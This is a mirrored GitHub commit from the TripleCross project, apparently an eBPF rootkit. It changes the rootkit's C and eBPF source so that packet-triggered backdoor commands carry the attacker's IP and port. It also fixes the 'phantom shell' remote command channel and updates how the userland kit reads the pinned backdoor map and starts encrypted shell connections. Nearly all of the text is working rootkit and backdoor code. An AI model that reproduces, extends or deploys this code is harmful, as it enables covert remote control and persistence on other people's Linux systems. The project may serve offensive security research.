mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-16 23:33:06 +08:00
Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces
This commit is contained in:
h3xduck
Binary file not shown.
File diff suppressed because it is too large
Load Diff
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -201,15 +201,15 @@ int phantom_shell_mode(char* buf, char* local_ip, char* dest){
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
sleep(5);
|
||||
//sleep(0.5);
|
||||
printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
|
||||
packet = rawsocket_sniff_pattern(CC_PROT_BASELINE);
|
||||
packet = rawsocket_sniff_pattern(CC_PROT_PHANTOM_COMMAND_RESPONSE);
|
||||
char* res = packet.payload;
|
||||
//TODO make the shell to fork and wait for response, but accept new requests meanwhile
|
||||
if(strncmp(res, CC_PROT_PHANTOM_COMMAND_RESPONSE, strlen(CC_PROT_PHANTOM_COMMAND_RESPONSE))==0){
|
||||
//Received a response
|
||||
char *p;
|
||||
p = strtok(buf, "#");
|
||||
p = strtok(res, "#");
|
||||
p = strtok(NULL, "#");
|
||||
if(p){
|
||||
//Print response
|
||||
@@ -236,7 +236,7 @@ int phantom_shell_mode(char* buf, char* local_ip, char* dest){
|
||||
}
|
||||
|
||||
|
||||
printf("["KGRN"RESPONSE"RESET"] %s\n", res);
|
||||
//printf("["KGRN"RESPONSE"RESET"] %s\n", res);
|
||||
|
||||
free(request);
|
||||
return 0;
|
||||
|
||||
Binary file not shown.
Binary file not shown.
@@ -20,6 +20,8 @@ struct rb_event {
|
||||
int code;
|
||||
struct backdoor_phantom_shell_data bps_data;
|
||||
event_type_t event_type;
|
||||
__u32 client_ip;
|
||||
__u16 client_port;
|
||||
};
|
||||
|
||||
#endif
|
||||
|
||||
@@ -49,7 +49,7 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
|
||||
*
|
||||
* @return 0 if ok, -1 if error
|
||||
*/
|
||||
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
|
||||
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code, __u32 ip, __u16 port){
|
||||
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
|
||||
if(!event){
|
||||
return -1;
|
||||
@@ -58,6 +58,8 @@ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer
|
||||
event->code = code;
|
||||
event->event_type = COMMAND;
|
||||
event->pid = pid;
|
||||
event->client_ip = ip;
|
||||
event->client_port = port;
|
||||
|
||||
bpf_ringbuf_submit(event, 0);
|
||||
return 0;
|
||||
|
||||
@@ -15,15 +15,15 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
|
||||
switch(command_received){
|
||||
case CC_PROT_COMMAND_ENCRYPTED_SHELL:
|
||||
bpf_printk("Received request to start encrypted connection\n");
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
|
||||
break;
|
||||
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
|
||||
bpf_printk("Received request to activate all hooks\n");
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
|
||||
break;
|
||||
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
|
||||
bpf_printk("Received request to deactivate all hooks\n");
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
|
||||
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
|
||||
break;
|
||||
case CC_PROT_COMMAND_PHANTOM_SHELL:
|
||||
bpf_printk("Received request to start phantom shell\n");
|
||||
@@ -301,8 +301,14 @@ backdoor_finish_v3_32:
|
||||
bpf_printk("FAIL CHECK 3\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
__u32 ip;
|
||||
__u16 port;
|
||||
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
|
||||
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
|
||||
|
||||
bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified);
|
||||
execute_key_command(command_received, 0, 0, NULL, 0);
|
||||
execute_key_command(command_received, ip, port, NULL, 0);
|
||||
|
||||
return 1;
|
||||
}
|
||||
@@ -446,8 +452,14 @@ backdoor_finish_v3_16:
|
||||
bpf_printk("FAIL CHECK 3\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
__u32 ip;
|
||||
__u16 port;
|
||||
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
|
||||
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
|
||||
|
||||
bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified);
|
||||
execute_key_command(command_received, 0, 0, NULL, 0);
|
||||
execute_key_command(command_received, ip, port, NULL, 0);
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
128
src/user/kit.c
128
src/user/kit.c
@@ -1,3 +1,4 @@
|
||||
#define _GNU_SOURCE
|
||||
#include <argp.h>
|
||||
#include <stdio.h>
|
||||
#include <time.h>
|
||||
@@ -5,6 +6,12 @@
|
||||
#include <sys/resource.h>
|
||||
#include <bpf/libbpf.h>
|
||||
#include <linux/if_link.h>
|
||||
#include <string.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <netinet/in.h>
|
||||
#include <net/if.h>
|
||||
#include <unistd.h>
|
||||
#include <locale.h>
|
||||
@@ -30,11 +37,55 @@
|
||||
}
|
||||
|
||||
static int FD_TC_MAP;
|
||||
__u32 ifindex; //Interface to which the rootkit connects
|
||||
char* local_ip;
|
||||
|
||||
static struct env {
|
||||
bool verbose;
|
||||
} env;
|
||||
|
||||
int check_map_fd_info(int map_fd, struct bpf_map_info *info, struct bpf_map_info *exp){
|
||||
__u32 info_len = sizeof(*info);
|
||||
int err;
|
||||
|
||||
if (map_fd < 0)
|
||||
return -1;
|
||||
|
||||
err = bpf_obj_get_info_by_fd(map_fd, info, &info_len);
|
||||
if (err) {
|
||||
fprintf(stderr, "ERR: %s() can't get info - %s\n",
|
||||
__func__, strerror(errno));
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (exp->key_size && exp->key_size != info->key_size) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map key size(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->key_size, exp->key_size);
|
||||
return -1;
|
||||
}
|
||||
if (exp->value_size && exp->value_size != info->value_size) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map value size(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->value_size, exp->value_size);
|
||||
return -1;
|
||||
}
|
||||
if (exp->max_entries && exp->max_entries != info->max_entries) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map max_entries(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->max_entries, exp->max_entries);
|
||||
return -1;
|
||||
}
|
||||
if (exp->type && exp->type != info->type) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map type(%d) mismatch expected type(%d)\n",
|
||||
__func__, info->type, exp->type);
|
||||
return -1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void print_help_dialog(const char* arg){
|
||||
|
||||
printf("\nUsage: %s ./kit OPTION\n\n", arg);
|
||||
@@ -112,11 +163,13 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
|
||||
|
||||
}else if(e->event_type == COMMAND){
|
||||
printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code);
|
||||
char attacker_ip[INET_ADDRSTRLEN];
|
||||
switch(e->code){
|
||||
case CC_PROT_COMMAND_ENCRYPTED_SHELL:
|
||||
//TODO EXTRACT IP FROM KERNEL BUFFER
|
||||
printf("Starting encrypted connection\n");
|
||||
client_run("127.0.1.1", 8500);
|
||||
inet_ntop(AF_INET, &e->client_ip, attacker_ip, INET_ADDRSTRLEN);
|
||||
printf("Starting encrypted connection with ip: %s\n", attacker_ip);
|
||||
client_run(local_ip, 8500);
|
||||
break;
|
||||
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
|
||||
printf("Activating all hooks as requested\n");
|
||||
@@ -139,9 +192,21 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
|
||||
printf("Requested to update the phantom shell\n");
|
||||
int key = 1;
|
||||
struct backdoor_phantom_shell_data data;
|
||||
int err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
|
||||
struct bpf_map_info map_expect = {0};
|
||||
struct bpf_map_info info = {0};
|
||||
FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
|
||||
printf("TC MAP ID: %i\n", FD_TC_MAP);
|
||||
map_expect.key_size = sizeof(__u64);
|
||||
map_expect.value_size = sizeof(struct backdoor_phantom_shell_data);
|
||||
map_expect.max_entries = 1;
|
||||
int err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
|
||||
if (err) {
|
||||
fprintf(stderr, "ERR: map via FD not compatible\n");
|
||||
return err;
|
||||
}
|
||||
err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
|
||||
if(err<0) {
|
||||
printf("Failed to read the shared map\n");
|
||||
printf("Failed to read the shared map: %d\n", err);
|
||||
return -1;
|
||||
}
|
||||
printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
|
||||
@@ -173,6 +238,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
|
||||
free(buf);
|
||||
printf("Post value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
|
||||
bpf_map_update_elem(FD_TC_MAP, &key, &data, 0);
|
||||
return 0;
|
||||
|
||||
}else{
|
||||
printf("Failed to parse command\n");
|
||||
@@ -191,48 +257,6 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
|
||||
return 0;
|
||||
}
|
||||
|
||||
int check_map_fd_info(int map_fd, struct bpf_map_info *info, struct bpf_map_info *exp){
|
||||
__u32 info_len = sizeof(*info);
|
||||
int err;
|
||||
|
||||
if (map_fd < 0)
|
||||
return -1;
|
||||
|
||||
err = bpf_obj_get_info_by_fd(map_fd, info, &info_len);
|
||||
if (err) {
|
||||
fprintf(stderr, "ERR: %s() can't get info - %s\n",
|
||||
__func__, strerror(errno));
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (exp->key_size && exp->key_size != info->key_size) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map key size(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->key_size, exp->key_size);
|
||||
return -1;
|
||||
}
|
||||
if (exp->value_size && exp->value_size != info->value_size) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map value size(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->value_size, exp->value_size);
|
||||
return -1;
|
||||
}
|
||||
if (exp->max_entries && exp->max_entries != info->max_entries) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map max_entries(%d) mismatch expected size(%d)\n",
|
||||
__func__, info->max_entries, exp->max_entries);
|
||||
return -1;
|
||||
}
|
||||
if (exp->type && exp->type != info->type) {
|
||||
fprintf(stderr, "ERR: %s() "
|
||||
"Map type(%d) mismatch expected type(%d)\n",
|
||||
__func__, info->type, exp->type);
|
||||
return -1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char**argv){
|
||||
struct ring_buffer *rb = NULL;
|
||||
struct kit_bpf *skel;
|
||||
@@ -248,8 +272,6 @@ int main(int argc, char**argv){
|
||||
}
|
||||
}*/
|
||||
|
||||
__u32 ifindex;
|
||||
|
||||
/* Parse command line arguments */
|
||||
int opt;
|
||||
while ((opt = getopt(argc, argv, ":t:vh")) != -1) {
|
||||
@@ -261,6 +283,16 @@ int main(int argc, char**argv){
|
||||
perror("Error on input interface");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
int fd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
struct ifreq ifr;
|
||||
//Type of address to retrieve - IPv4 IP address
|
||||
ifr.ifr_addr.sa_family = AF_INET;
|
||||
//Copy the interface name in the ifreq structure
|
||||
strncpy(ifr.ifr_name , optarg , IFNAMSIZ-1);
|
||||
ioctl(fd, SIOCGIFADDR, &ifr);
|
||||
close(fd);
|
||||
local_ip = inet_ntoa(( (struct sockaddr_in *)&ifr.ifr_addr )->sin_addr);
|
||||
printf("%s - %s\n" , optarg , local_ip );
|
||||
break;
|
||||
case 'v':
|
||||
//Verbose output
|
||||
|
||||
Reference in New Issue
Block a user